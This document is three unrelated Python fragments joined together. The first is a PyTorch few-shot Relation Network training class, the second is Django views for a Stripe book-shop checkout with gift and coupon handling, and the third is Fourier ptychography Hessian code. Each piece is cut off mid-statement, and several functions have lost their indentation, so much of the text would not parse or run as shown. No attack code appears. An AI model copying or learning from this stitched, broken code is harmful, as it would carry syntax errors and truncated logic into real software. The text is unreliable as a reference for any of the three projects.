        self.relation_network.apply(self._weights_init).cuda()
        self.feature_encoder_optim = torch.optim.Adam(self.feature_encoder.parameters(), lr=self.learning_rate)
        self.feature_encoder_scheduler = StepLR(self.feature_encoder_optim, self.train_episode//3, gamma=0.5)
        self.relation_network_optim = torch.optim.Adam(self.relation_network.parameters(), lr=self.learning_rate)
        self.relation_network_scheduler = StepLR(self.relation_network_optim, self.train_episode//3, gamma=0.5)
        self.loss = self._loss()
        # The SummaryWriter is created lazily on first use (see _feature_vision).
        self.summary_dir = summary_dir
        self.is_summary = self.summary_dir is not None
        self.writer = None
        pass
@staticmethod
def _weights_init(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif classname.find('BatchNorm') != -1:
m.weight.data.fill_(1)
m.bias.data.zero_()
elif classname.find('Linear') != -1:
m.weight.data.normal_(0, 0.01)
m.bias.data = torch.ones(m.bias.data.size())
pass
pass
    @staticmethod
    def _loss():
        # Mean-squared-error criterion, placed on the GPU.
        mse = nn.MSELoss().cuda()
        return mse
    def load_model(self):
        """Restore encoder and relation-network weights from their checkpoint files, if present."""
        if os.path.exists(self.feature_encoder_dir):
            self.feature_encoder.load_state_dict(torch.load(self.feature_encoder_dir))
            Tools.print("load feature encoder success from {}".format(self.feature_encoder_dir))
        if os.path.exists(self.relation_network_dir):
            self.relation_network.load_state_dict(torch.load(self.relation_network_dir))
            Tools.print("load relation network success from {}".format(self.relation_network_dir))
        pass
    def _feature_vision(self, other_sample_features,
                        other_batch_features, other_relation_features, episode, is_vision=False):
        """
        Periodically write feature-map images and parameter histograms to TensorBoard.

        Runs only when summaries are enabled and either ``episode`` is a multiple
        of 20000 or ``is_vision`` forces it.

        :param other_sample_features: dict of intermediate tensors from the encoder (support set)
        :param other_batch_features: dict of intermediate tensors from the encoder (query set)
        :param other_relation_features: dict of intermediate tensors from the relation head
        :param episode: current episode index; negative values are logged under "Val"
        :param is_vision: force visualization regardless of the episode counter
        """
        if self.is_summary and (episode % 20000 == 0 or is_vision):
            if self.writer is None:
                # Lazily create the writer on first use.
                self.writer = SummaryWriter(self.summary_dir)
                pass
            feature_root_name = "Train" if episode >= 0 else "Val"
            # Feature visualization
            for other_features, name in [[other_sample_features, "Sample"],
                                         [other_batch_features, "Batch"],
                                         [other_relation_features, "Relation"]]:
                for key in other_features:
                    if other_features[key].size(1) == 3:  # 3 channels: the original input image
                        one_features = vutils.make_grid(other_features[key], normalize=True,
                                                        scale_each=True, nrow=self.batch_num_per_class)
                        self.writer.add_image('{}-{}-{}'.format(feature_root_name, name, key), one_features, episode)
                        pass
                    else:  # feature maps: log each channel as its own image grid
                        key_features = torch.split(other_features[key], split_size_or_sections=1, dim=1)
                        for index, feature_one in enumerate(key_features):
                            one_features = vutils.make_grid(feature_one, normalize=True,
                                                            scale_each=True, nrow=self.batch_num_per_class)
                            self.writer.add_image('{}-{}-{}/{}'.format(feature_root_name, name,
                                                                       key, index), one_features, episode)
                            pass
                        pass
                    pass
                pass
            # Parameter visualization (histogram per named parameter)
            for name, param in self.feature_encoder.named_parameters():
                self.writer.add_histogram(name, param.clone().cpu().data.numpy(), episode)
                pass
            for name, param in self.relation_network.named_parameters():
                self.writer.add_histogram(name, param.clone().cpu().data.numpy(), episode)
                pass
            pass
        pass
# Original 1
def compare_fsl_1(self, samples, batches):
    """Classic Relation Network comparison: tile every (support, query) pair,
    concatenate their feature maps channel-wise, and score each pair with the
    relation network.

    :param samples: support-set images (moved to the GPU here)
    :param batches: query-set images (moved to the GPU here)
    :return: (relations, other_sample_features, other_batch_features,
              other_relation_features)
    """
    # Encode both image sets.
    sample_features, other_sample_features = self.feature_encoder(samples.cuda(), self.is_summary)  # 5x64*19*19
    batch_features, other_batch_features = self.feature_encoder(batches.cuda(), self.is_summary)  # 75x64*19*19
    num_query, channels, width, height = batch_features.shape
    num_support = self.sample_num_per_class * self.class_num
    # Tile so that every query feature map is paired with every support map.
    support_ext = sample_features.unsqueeze(0).repeat(num_query, 1, 1, 1, 1)
    query_ext = torch.transpose(batch_features.unsqueeze(0).repeat(num_support, 1, 1, 1, 1), 0, 1)
    # Channel-wise concatenation -> one stacked map per (query, support) pair.
    relation_pairs = torch.cat((support_ext, query_ext), 2).view(-1, channels * 2, width, height)
    relations, other_relation_features = self.relation_network(relation_pairs, self.is_summary)
    relations = relations.view(-1, self.class_num * self.sample_num_per_class)
    return relations, other_sample_features, other_batch_features, other_relation_features
# Original 2
def compare_fsl_2(self, samples, batches):
    """Score support/query pairs via cosine similarity between every pair of
    spatial positions in their encoded feature maps; the relation network then
    maps the resulting (w*h x w*h) similarity map to class relation scores.

    :param samples: support-set images (moved to the GPU here)
    :param batches: query-set images (moved to the GPU here)
    :return: (relations, other_sample_features, other_batch_features,
              other_relation_features)
    """
    # features
    sample_features, other_sample_features = self.feature_encoder(samples.cuda(), self.is_summary)  # 5x64*19*19
    batch_features, other_batch_features = self.feature_encoder(batches.cuda(), self.is_summary)  # 75x64*19*19
    # size
    sample_batch_size, feature_channel, feature_width, feature_height = sample_features.shape
    batch_batch_size = batch_features.shape[0]
    wxh = feature_width * feature_height
    # pair every query feature map with every support feature map
    sample_features_ext = sample_features.unsqueeze(0).repeat(batch_batch_size, 1, 1, 1, 1)
    batch_features_ext = batch_features.unsqueeze(0).repeat(self.sample_num_per_class * self.class_num, 1, 1, 1, 1)
    batch_features_ext = torch.transpose(batch_features_ext, 0, 1)
    # reshape: flatten the spatial dims, then merge the two pair dims
    sample_features_ext = sample_features_ext.view(batch_batch_size, sample_batch_size, feature_channel, -1)
    sample_features_ext = sample_features_ext.view(-1, feature_channel, sample_features_ext.shape[-1])
    batch_features_ext = batch_features_ext.view(batch_batch_size, sample_batch_size, feature_channel, -1)
    batch_features_ext = batch_features_ext.reshape(-1, feature_channel, batch_features_ext.shape[-1])
    # prepare every position-vs-position combination (wxh x wxh per pair)
    sample_features_ext = sample_features_ext.unsqueeze(2).repeat(1, 1, wxh, 1)
    batch_features_ext = torch.transpose(batch_features_ext.unsqueeze(2).repeat(1, 1, wxh, 1), 2, 3)
    # cosine similarity over the channel dimension
    relation_pairs = torch.cosine_similarity(sample_features_ext, batch_features_ext, dim=1)
    relation_pairs = relation_pairs.view(-1, wxh * wxh)
    # relation scores
    relations, other_relation_features = self.relation_network(relation_pairs, self.is_summary)
    relations = relations.view(-1, self.class_num * self.sample_num_per_class)
    return relations, other_sample_features, other_batch_features, other_relation_features
# Original 3 (matmul variant of Original 2)
def compare_fsl_3(self, samples, batches):
    """Score support/query pairs from inner products between every pair of
    spatial positions (computed as one batched matmul), then let the relation
    network map the (w*h x w*h) map to class relation scores.

    NOTE(review): the original comment called this cosine similarity, but no
    normalization is applied before the matmul — these are raw inner products.

    :return: (relations, other_sample_features, other_batch_features,
              other_relation_features)
    """
    # features
    sample_features, other_sample_features = self.feature_encoder(samples.cuda(), self.is_summary)  # 5x64*19*19
    batch_features, other_batch_features = self.feature_encoder(batches.cuda(), self.is_summary)  # 75x64*19*19
    # size
    sample_batch_size, feature_channel, feature_width, feature_height = sample_features.shape
    batch_batch_size = batch_features.shape[0]
    wxh = feature_width * feature_height
    sample_features = sample_features.view(sample_batch_size, feature_channel, -1)
    batch_features = batch_features.view(batch_batch_size, feature_channel, -1)
    # pair every query feature map with every support feature map
    sample_features_ext = sample_features.unsqueeze(0).repeat(batch_batch_size, 1, 1, 1)
    batch_features_ext = batch_features.unsqueeze(0).repeat(self.sample_num_per_class * self.class_num, 1, 1, 1)
    batch_features_ext = torch.transpose(batch_features_ext, 0, 1)
    # reshape: merge the pair dims; transpose query maps for the matmul
    sample_features_ext = sample_features_ext.view(-1, feature_channel, wxh)
    batch_features_ext = batch_features_ext.reshape(-1, feature_channel, wxh)
    batch_features_ext = torch.transpose(batch_features_ext, 1, 2)
    # position-wise similarity via matrix multiplication (see NOTE above)
    relation_pairs = torch.matmul(batch_features_ext, sample_features_ext)
    relation_pairs = relation_pairs.view(-1, wxh * wxh)
    # relation scores
    relations, other_relation_features = self.relation_network(relation_pairs, self.is_summary)
    relations = relations.view(-1, self.class_num * self.sample_num_per_class)
    return relations, other_sample_features, other_batch_features, other_relation_features
# dilation
def compare_fsl_4(self, samples, batches):
    """Relation comparison over three (dilated) feature maps: every one of the
    3x3 (support map i, query map j) combinations is tiled and concatenated
    channel-wise before the relation network scores the stack.

    NOTE(review): assumes the encoder returns at least 4 values, the first
    three being same-shaped feature maps and the last the auxiliary feature
    dict — confirm against the encoder implementation.

    :return: (relations, other_sample_features, other_batch_features,
              other_relation_features)
    """
    # features: encoder returns several feature maps plus auxiliary features
    all_sample_features = self.feature_encoder(samples.cuda(), self.is_summary)  # 5x64*19*19
    sample_features_all, other_sample_features = all_sample_features[: -1], all_sample_features[-1]
    all_batch_features = self.feature_encoder(batches.cuda(), self.is_summary)  # 75x64*19*19
    batch_features_all, other_batch_features = all_batch_features[: -1], all_batch_features[-1]
    batch_size, feature_dim, feature_width, feature_height = batch_features_all[0].shape
    sample_features_all_ext = []
    batch_features_all_ext = []
    # Replicate so that the zip below enumerates all 3x3 scale combinations.
    sample_features_all = [sample_features_all[0], sample_features_all[0], sample_features_all[0],
                           sample_features_all[1], sample_features_all[1], sample_features_all[1],
                           sample_features_all[2], sample_features_all[2], sample_features_all[2]]
    batch_features_all = [batch_features_all[0], batch_features_all[1], batch_features_all[2],
                          batch_features_all[0], batch_features_all[1], batch_features_all[2],
                          batch_features_all[0], batch_features_all[1], batch_features_all[2]]
    for sample_features, batch_features in zip(sample_features_all, batch_features_all):
        # calculate relations: tile every (support, query) pairing
        sample_features_ext = sample_features.unsqueeze(0).repeat(batch_size, 1, 1, 1, 1)
        batch_features_ext = batch_features.unsqueeze(0).repeat(
            self.sample_num_per_class * self.class_num, 1, 1, 1, 1)
        batch_features_ext = torch.transpose(batch_features_ext, 0, 1)
        sample_features_all_ext.append(sample_features_ext)
        batch_features_all_ext.append(batch_features_ext)
        pass
    # Stack all 9 combinations along the channel dim, then concat support/query.
    sample_features_all_ext = torch.cat(sample_features_all_ext, 2)
    batch_features_all_ext = torch.cat(batch_features_all_ext, 2)
    relation_pairs = torch.cat((sample_features_all_ext, batch_features_all_ext),
                               2).view(-1, feature_dim * 2 * 3 * 3, feature_width, feature_height)
    relations, other_relation_features = self.relation_network(relation_pairs, self.is_summary)
    relations = relations.view(-1, self.class_num * self.sample_num_per_class)
    return relations, other_sample_features, other_batch_features, other_relation_features
def train(self):
    """Main training loop.

    Each episode: sample a fresh few-shot task, compute relation scores with
    the configured compare function, back-propagate an MSE loss against the
    one-hot labels, clip gradients, and step optimizers/schedulers. Every
    ``val_freq`` episodes, validate and checkpoint the best model.

    Fixes vs the previous version:
    - average loss used denominator ``episode % self.val_freq``, which is off
      by one and can be zero (ZeroDivisionError); now uses the true count of
      episodes accumulated since the last reset.
    - ``runner.val_train`` reached for a module-level global; use ``self``
      like the adjacent ``self.val`` call.
    - ``.__iter__().next()`` is Python-2-only; ``next(iter(...))`` works on
      both Python 2.6+ and 3.
    """
    Tools.print()
    Tools.print("Training...")
    if self.is_summary and self.writer is None:
        self.writer = SummaryWriter(self.summary_dir)
    all_loss = 0.0
    for episode in range(self.train_episode):
        # init dataset: a fresh episode task each iteration
        task = MiniImageNetTask(self.folders_train, self.class_num,
                                self.sample_num_per_class, self.batch_num_per_class)
        sample_data_loader = MiniImageNet.get_data_loader(task, self.sample_num_per_class, "train",
                                                          shuffle=False, data_dict=self.data_dict)
        batch_data_loader = MiniImageNet.get_data_loader(task, self.batch_num_per_class, split="val",
                                                         shuffle=True, data_dict=self.data_dict)
        samples, sample_labels = next(iter(sample_data_loader))
        batches, batch_labels = next(iter(batch_data_loader))
        ###########################################################################
        # calculate features (compare_fsl_fn is stored unbound, so pass self)
        relations, other_sample_features, other_batch_features, other_relation_features = self.compare_fsl_fn(
            self, samples, batches)
        # visualization
        self._feature_vision(other_sample_features, other_batch_features, other_relation_features, episode)
        ###########################################################################
        one_hot_labels = torch.zeros(self.batch_num_per_class * self.class_num,
                                     self.class_num).scatter_(1, batch_labels.view(-1, 1), 1).cuda()
        loss = self.loss(relations, one_hot_labels)
        self.feature_encoder.zero_grad()
        self.relation_network.zero_grad()
        loss.backward()
        torch.nn.utils.clip_grad_norm_(self.feature_encoder.parameters(), 0.5)
        torch.nn.utils.clip_grad_norm_(self.relation_network.parameters(), 0.5)
        self.feature_encoder_optim.step()
        self.relation_network_optim.step()
        self.feature_encoder_scheduler.step(episode)
        self.relation_network_scheduler.step(episode)
        if self.is_summary:
            self.writer.add_scalar('loss/now-loss', loss.item(), episode)
            self.writer.add_scalar('learning-rate', self.feature_encoder_scheduler.get_lr(), episode)
        all_loss += loss.item()
        # Episodes accumulated into all_loss since the last reset (all_loss is
        # zeroed after each validation). Old code divided by
        # (episode % self.val_freq), which is off by one and can be zero.
        episodes_since_reset = (episode % self.val_freq) + 1
        if (episode + 1) % self.print_freq == 0:
            Tools.print("Episode: {} avg loss: {} loss: {} lr: {}".format(
                episode + 1, all_loss / episodes_since_reset, loss.item(),
                self.feature_encoder_scheduler.get_lr()))
        if (episode + 1) % self.val_freq == 0:
            Tools.print()
            Tools.print("Valing...")
            # was `runner.val_train(...)` — a module global; keep consistent with self.val
            train_accuracy, train_h = self.val_train(episode, is_print=True)
            val_accuracy, val_h = self.val(episode, is_print=True)
            if val_accuracy > self.best_accuracy:
                self.best_accuracy = val_accuracy
                torch.save(self.feature_encoder.state_dict(), self.feature_encoder_dir)
                torch.save(self.relation_network.state_dict(), self.relation_network_dir)
                Tools.print("Save networks for episode: {}".format(episode))
            if self.is_summary:
                self.writer.add_scalar('loss/avg-loss', all_loss / episodes_since_reset, episode)
                self.writer.add_scalar('accuracy/val', val_accuracy, episode)
                self.writer.add_scalar('accuracy/train', train_accuracy, episode)
            all_loss = 0.0
            Tools.print()
def _val(self, folders, sampler_test, all_episode, episode=-1):
def mean_confidence_interval(data, confidence=0.95):
a = 1.0 * np.array(data)
n = len(a)
m, se = np.mean(a), scipy.stats.sem(a)
h = se * sp.stats.t._ppf((1 + confidence) / 2., n - 1)
return m, h
accuracies = []
for i in range(all_episode):
total_rewards = 0
counter = 0
# 随机选5类,每类中取出1个作为训练样本,每类取出15个作为测试样本
task = MiniImageNetTask(folders, self.class_num, self.sample_num_per_class, self.batch_num_per_class)
sample_data_loader = MiniImageNet.get_data_loader(task, 1, "train", sampler_test=sampler_test,
shuffle=False, data_dict=self.data_dict)
batch_data_loader = MiniImageNet.get_data_loader(task, 3, "val", sampler_test=sampler_test,
shuffle=True, data_dict=self.data_dict)
samples, labels = sample_data_loader.__iter__().next()
for batches, batch_labels in batch_data_loader:
###########################################################################
# calculate features
relations, other_sample_features, other_batch_features, other_relation_features = self.compare_fsl_fn(
self, samples, batches)
# 可视化
is_vision = False if episode > 0 else True
episode = episode if | |
import json
import os
import stripe
from django.contrib import messages
from django.conf import settings
from django.contrib.auth import login, logout, authenticate
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.core.exceptions import ObjectDoesNotExist
from django.core.mail import mail_admins
from django.db import IntegrityError
from django.http import JsonResponse
from django.shortcuts import render, redirect, get_object_or_404
from books import forms, helpers, coupon_codes
from books.models import Customer
stripe.api_key = os.environ['STRIPE_SECRET']
# TODO: Set up something so people who made accounts but haven't bought
# anything are tracked.
# TODO: This view should be renamed to log in or create account
def upsell(request, product_slug=None):
    """Log a visitor in or create their account, then route them to the
    charge page for `product_slug`.

    Routing rules visible below:
    - Authenticated users who are neither giftees nor never-purchased accounts
      skip straight to /charge with the 'customerfriend' coupon.
    - Authenticated users flagged 'brand_new_user' go to /charge undiscounted.
    - Otherwise a POSTed email/password either authenticates an existing user
      or creates a brand new account.
    """
    # User is logged in, go straight to buy page (as long as they're not a
    # gifted user or someone who made a log in but hasn't bought yet.)
    if request.user.is_authenticated and 'giftee_user' not in request.session and 'brand_new_user' not in request.session:
        return redirect('/charge/%s' % product_slug + '?coupon=customerfriend')
    # if they went through upsell page but haven't bought anything, go to charge
    # page without the coupon
    if request.user.is_authenticated and 'brand_new_user' in request.session:
        return redirect('/charge/%s' % product_slug)
    # grab coupon if supplied
    coupon_supplied = request.GET.get("coupon", None)
    # Get someone to log in OR create an account
    form_class = forms.AddEmailForm
    if request.method == 'POST':
        request.session.pop('brand_new_user', None)
        form = form_class(request.POST)
        if form.is_valid():
            email = form.cleaned_data['email']
            password = form.cleaned_data['password']
            # usernames are the email address with '@' and '.' stripped
            username = email.replace("@", "").replace(".", "")
            # check to see if they already have an account
            user = authenticate(username=username, password=password)
            if not user:
                # no user returned by authenticate either means wrong password
                # or no account
                try:
                    User.objects.get(email=email)
                except ObjectDoesNotExist:
                    # create new account
                    user = User.objects.create_user(
                        username=username,
                        email=email,
                        password=password,
                    )
                    request.session['brand_new_user'] = True
                    # FIXME: Maybe don't log in the person? Because then
                    # if they return to the page, it gives them a discount
                    login(request, user)
                    if coupon_supplied:
                        return redirect('/charge/' + product_slug + '/?coupon=' + coupon_supplied)
                    return redirect('charge', product_slug=product_slug)
                # user wasn't found but the email exists in the system, so their
                # password must be wrong (or something)
                messages.error(request, 'Email address found in system but password did not match. Try again?')
                if coupon_supplied:
                    return redirect('/buy/' + product_slug + '/?coupon=' + coupon_supplied)
                return redirect('upsell', product_slug=product_slug)
            else:
                # existing user was found and logged in
                login(request, user)
                if coupon_supplied:
                    return redirect('/charge/%s' % product_slug + '/?coupon=' + coupon_supplied)
                return redirect('/charge/%s' % product_slug + '/?coupon=customerfriend')
    else:
        form = form_class()
    # GET, or an invalid POST: render with the (possibly bound) form
    return render(request, 'order/upsell.html', {
        'form': form,
        'product': product_slug,
        'coupon_supplied': coupon_supplied,
    })
def gift(request, product_slug):
    """Start a gift purchase: stash the giftee's details in the session and
    continue to the charge page.

    Bails out with an error if the giftee already has an account (unhandled
    use-case for now) or if the view is reached without a POST.
    """
    if request.method != 'POST':
        messages.error(request, 'How did you get here? Email <EMAIL> if you need help!')
        return redirect('order')
    email = request.POST['gifteeEmail']
    message = request.POST['gifteeMessage']
    username = email.replace("@", "").replace(".", "")
    # FIXME: What should we do if someone *already* has an account?
    # Need to create a backend so I can log into the user without a
    # password re: https://stackoverflow.com/questions/6560182/django-authentication-without-a-password
    # PUNTING for now
    # Make sure there isn't a user account for this yet.
    try:
        User.objects.get(email=email)
    except ObjectDoesNotExist:
        # No existing account: remember who the gift is for and move on.
        request.session['giftee_user'] = username
        request.session['giftee_email'] = email
        request.session['giftee_message'] = message
        return redirect('charge', product_slug=product_slug)
    # An account with that email already exists — not supported yet.
    mail_admins("Bad happenings on HWB", "Attempting to gift a product to someone who already has an account.")
    messages.error(request, "That person already has an account on Hello Web Books! This is a use-case that Tracy hasn't written the code for yet (whoops.) Please email <EMAIL> and she'll set it up manually with a discount for your trouble.")
    return redirect('upsell', product_slug=product_slug)
def charge(request, product_slug=None):
    """Charge the current (or gifted) user for `product_slug` via Stripe.

    GET renders the payment form. POST creates/reuses the Stripe customer,
    creates the charge, records the purchase locally, and routes the buyer
    onward (dashboard, or back to 'order' for gift purchases).

    Fixes vs the previous version:
    - `customer.last_4_digits = charge.source.last4,` had a trailing comma,
      storing a one-element tuple instead of the digits string.
    - the local previously named `id` shadowed the builtin and relied on
      boolean short-circuiting to avoid being read while unbound; it is now
      initialized to None and renamed.
    """
    user = request.user
    if not user.is_authenticated and 'giftee_user' not in request.session:
        messages.error(request, "Please choose a product and sign in or create an account first.")
        return redirect('order')
    # grab coupon if supplied
    coupon_supplied = request.GET.get("coupon", None)
    amount, product_name, us_postage, can_postage, aus_postage, eur_postage, else_postage, paperback_price = helpers.product_details(product_slug)
    product_obj, product_obj2, paperback, video, supplement = helpers.product_split(product_slug)
    if request.method == "POST":
        gifted_product = False
        source = request.POST['stripeToken']
        amount = int(float(request.POST['paymentAmount']))  # rounds down in case of half numbers
        coupon = request.POST['stripeCoupon'] or ""
        has_paperback = request.POST['hasPaperback'] == 'true'
        args = json.loads(request.POST['stripeArgs'])
        shipping = helpers.shipping_details(args)
        # Check whether this is a gifted product
        if 'giftee_user' in request.session:
            try:
                user = User.objects.create_user(
                    username=request.session['giftee_user'],
                    email=request.session['giftee_email'],
                    password=User.objects.make_random_password(),
                )
                gifted_product = True
            except IntegrityError:
                mail_admins("Bad happenings on HWB", "Attempting to gift a product to someone who already has an account.")
                messages.error(request, "That person already has an account on Hello Web Books! This is a use-case that Tracy hasn't written the code for yet (whoops.) Please email <EMAIL> and she'll set it up manually with a discount for your trouble.")
                return redirect('order')
        # See if they're already a customer if this is not a gift
        existing_customer = False
        gifted_customer = False
        stripe_customer_id = None
        if not gifted_product:
            try:
                customer = Customer.objects.get(user=request.user)
                stripe_customer_id = customer.stripe_id
                existing_customer = True
                if customer.gift:
                    gifted_customer = True
            except Customer.DoesNotExist:  # New customer
                pass
        # if the customer is buying something and their account was gifted,
        # the stripe customer needs to be wiped and replaced with a new customer
        if gifted_customer:
            # retrieve listing from stripe, delete
            cu = stripe.Customer.retrieve(customer.stripe_id)
            try:
                cu.delete()
            except stripe.error.InvalidRequestError:
                # customer not found on Stripe's end, might have already been deleted
                pass
        # create the stripe customer for the gifted-user or the new-user
        if gifted_product or not existing_customer or gifted_customer or not stripe_customer_id:
            # XXX: confirm that the customer object of gifter is overridden by
            # the new customer object in Stripe
            stripe_customer_id = helpers.create_stripe_customer(request, product_slug, user, source, shipping, coupon)
        # charge the customer
        try:
            charge = stripe.Charge.create(
                customer=stripe_customer_id,
                amount=amount,  # set above from the POSTed payment amount
                currency='usd',
                description=product_name,
                shipping=shipping,
            )
        except stripe.error.CardError as e:
            # card declined: surface Stripe's message to the buyer
            body = e.json_body
            err = body.get('error', {})
            messages.error(request, err.get('message'))
            return redirect('charge', product_slug=product_slug)
        except stripe.error.InvalidRequestError as e:
            messages.error(request, "Sorry, an error has occured! We've been emailed this issue and will be on it within 24 hours. If you'd like to know when we've fixed it, email <EMAIL>. Our sincere apologies.")
            mail_admins("Stripe Invalid Request Errror on HWB", "Payment failure for [%s] - [%s]" % (user.email, e))
            return redirect('charge', product_slug=product_slug)
        except stripe.error.StripeError as e:
            messages.error(request, "Sorry, an error has occured! We've been emailed this issue and will be on it within 24 hours. If you'd like to know when we've fixed it, email <EMAIL>. Our sincere apologies.")
            mail_admins("Bad happenings on HWB", "Payment failure for [%s] - [%s]" % (user.email, e))
            return redirect('charge', product_slug=product_slug)
        if not existing_customer:
            customer = Customer(
                stripe_id=stripe_customer_id,
                last_4_digits=charge.source.last4,
                user=user,
                gift=gifted_product,  # true when this purchase is a gift for someone else
            )
        # gifted customer should have added their credit card by now, so we can
        # update their Customer object
        if gifted_customer or not customer.stripe_id:
            customer.stripe_id = stripe_customer_id
            # BUG FIX: trailing comma previously stored a 1-tuple here
            customer.last_4_digits = charge.source.last4
            customer.gift = False
        # overwrite coupon if another is used
        if coupon:
            customer.coupon = coupon
        customer.save()
        # save the memberships in the database
        helpers.new_account_memberships(supplement, has_paperback, video, customer, product_obj, product_obj2)
        # send success email to admin
        helpers.send_admin_charge_success_email(user.email, product_name, has_paperback, supplement, gifted_product)
        if not settings.DEBUG:
            # subscribe the person to convertkit
            helpers.subscribe_to_newsletter(user.email, product_slug, has_paperback)
            # invite the person into the slack channel
            #helpers.invite_to_slack(user.email, product_name)
        # if this is a gifted product, send the person a gift email
        if 'giftee_user' in request.session:
            helpers.send_giftee_password_reset(
                request,
                user.email,
                product_name,
                'registration/giftee_password_reset_subject.txt',
                'registration/giftee_password_reset_email.txt',
                request.session.get('giftee_message'),
            )
            logout(request)
            messages.success(request, "Success! We've sent an email to your giftee with how to access their files.")
            request.session.pop('giftee_user', None)
            return redirect('order')
        # log in customer, redirect to their dashboard
        messages.success(request, "Success! You can access your product below.")
        request.session.pop('brand_new_user', None)
        return redirect('dashboard')
    else:
        form = forms.StripePaymentForm()
    return render(request, "order/charge.html", {
        'form': form,
        'publishable_key': settings.STRIPE_PUBLISHABLE,
        'product': product_slug,
        'paperback': paperback,
        'paperback_price': paperback_price,
        'amount': amount,
        'product_name': product_name,
        'us_postage': us_postage,
        'can_postage': can_postage,
        'eur_postage': eur_postage,
        'aus_postage': aus_postage,
        'else_postage': else_postage,
        'coupon_supplied': coupon_supplied,
    })
@login_required
def check_coupon(request):
    """AJAX endpoint: validate a coupon code.

    Responds {'status': 'ok', 'discount': <amount>} when the coupon is known
    and ?format=json was requested; {'status': 'fail'} otherwise.
    """
    coupon = request.GET.get("coupon")
    format = request.GET.get("format")
    known_coupon = coupon in coupon_codes.COUPON_LOOKUP
    if known_coupon and format == 'json':
        return JsonResponse({
            'status': 'ok',
            'discount': coupon_codes.COUPON_LOOKUP[coupon],
        })
    return JsonResponse({
        'status': 'fail',
    })
@login_required
def charge_update(request):
user = request.user
customer = get_object_or_404(Customer, user=user)
last_4_digits = customer.last_4_digits
if request.method == "POST":
form = forms.StripePaymentForm(request.POST)
if form.is_valid(): # charges the card
cu = stripe.Customer.retrieve(customer.stripe_id)
| |
same length as x
Optional parameters:
funcVal_only: boolean variable, function returns fval only if true
forward_only: boolean variable, the function returns Ax only if true, else
returns both Ax and gradient
"""
if frames_to_process is None:
frames_to_process = range(self.n_frames)
elif (type(frames_to_process) is not list) and type(frames_to_process) is not range and type(frames_to_process) is not np.arange:
frames_to_process = [frames_to_process]
# Forward model is a list of images
Ax = np.zeros([len(frames_to_process), self.m_crop, self.n_crop])
# Apply forward model to images (allow multiplexing)
for frame_index in range(len(frames_to_process)):
for led_index in range(len(self.cropystart[frame_index])):
Ax[frame_index, :, :] += np.abs(self.iF(self.objf[self.cropystart[frame_index][led_index][0]:self.cropyend[frame_index][led_index][0],
self.cropxstart[frame_index][led_index][0]:self.cropxend[frame_index][led_index][0]] * self.pupil))
if forward_only:
return Ax.ravel()
# Compute Cost
fval = 0
for frame_index in range(len(frames_to_process)):
fval += la.norm(np.sqrt(self.frame_list[frame_index, :, :].ravel()) - Ax[frame_index, :, :].ravel()) ** 2
# Compute gradient
if funcVal_only:
return fval
else:
mask = np.zeros([len(frames_to_process), self.M, self.N], dtype=np.bool)
gradient_list = []
mask_list = []
gradient = np.zeros([self.M, self.N], dtype="complex128")
for index, frame_index in enumerate(frames_to_process):
gradient *= 0 # Set gradient to zero
for led_index in range(len(self.cropystart[frame_index])):
objfcrop_p = self.objf[self.cropystart[frame_index][led_index][0]:self.cropyend[frame_index][led_index][0],
self.cropxstart[frame_index][led_index][0]:self.cropxend[frame_index][led_index][0]] * self.pupil
objfcrop_ampsub = self.F(np.sqrt(self.frame_list[frame_index, :, :]) * np.exp(1j * np.angle(self.iF(objfcrop_p))))
gradient[self.cropystart[frame_index][led_index][0]:self.cropyend[frame_index][led_index][0],
self.cropxstart[frame_index][led_index][0]:self.cropxend[frame_index][led_index][0]] += np.conj(self.pupil) * (objfcrop_ampsub - objfcrop_p)
mask_list.append(np.abs(gradient) > 0)
gradient_list.append(gradient[np.abs(gradient) > 0])
return(gradient_list, mask_list), fval
def applyHessianSeq(self, x, idx, obj):
    """
    This function applies the local (per-frame) Hessian operator to point x.
    The Hessian operator is evaluated at current point obj, with
    Levenberg-Marquardt damping (options.lm_delta2) added on the diagonal.

    Removed from the previous version: a dead `Hx = x.copy()` (overwritten
    before first use) and the unused local `g_norm`.

    Input:
        x: 1D complex array, point to which local Hessian is applied
        idx: frame index selecting the crop window
        obj: global object (spectrum) to be cropped corresponding to index idx
    Return:
        Hx: 1D complex array, same type/size as x
    """
    x = np.reshape(x, [self.m_crop, self.n_crop])
    N = float(x.size)
    # Forward field for this frame: crop the spectrum, apply pupil, inverse FFT.
    g = self.iF(self.pupil * obj[self.cropystart[idx][0]:self.cropyend[idx][0],
                                 self.cropxstart[idx][0]:self.cropxend[idx][0]])
    # Hessian-vector product: diagonal pupil term plus a phase-coupled term
    # involving conj(x) through exp(2j * angle(g)).
    Hx = 1/4./N * np.abs(self.pupil) ** 2 * x + \
         1/4./N * np.conjugate(self.pupil) * self.F((np.exp(1j * np.angle(g)) ** 2) * self.F(np.conjugate(self.pupil)*np.conjugate(x)))
    # Levenberg-Marquardt damping term.
    Hx += self.options.lm_delta2 * x
    return Hx.ravel()
def applyHessianGlobal(self, x, idx=None):
    """
    This function applies the global Hessian operator to point x.
    The Hessian operator is evaluated at the current point self.objcrop /
    self.frame_list, averaged over the processed frames, with
    Levenberg-Marquardt damping (options.lm_delta2) on the diagonal.

    Bug fix: the previous loop iterated over the *elements* of
    frames_to_process and then indexed the list with them
    (`frames_to_process[p_img]`), which raises IndexError whenever idx > 0.
    We now iterate over the frame indices directly.

    Input:
        x: 1D complex array, point to which global Hessian is applied
        idx: optional single frame index; all frames are processed when None
    Return:
        Hx: complex column vector of shape (x.size, 1)
    """
    if idx is None:
        frames_to_process = range(self.n_frames)
    else:
        frames_to_process = [idx]
    x = np.reshape(x, [self.M, self.N])
    Hx = np.zeros([self.M, self.N], dtype="complex128")
    for frame_index in frames_to_process:
        gl = self.objcrop[frame_index, 0, :, :]  # current estimate for this frame (led index 0)
        objcrop_p = self.iF(x[self.cropystart[frame_index][0]:self.cropyend[frame_index][0],
                              self.cropxstart[frame_index][0]:self.cropxend[frame_index][0]] * self.pupil)
        # Two Hessian contributions: data term and its conjugate-coupled part.
        HOO = np.conj(self.pupil) * self.F(objcrop_p - 0.5 * np.sqrt(self.frame_list[frame_index, :, :])/(np.abs(gl) + 1e-15) * objcrop_p)
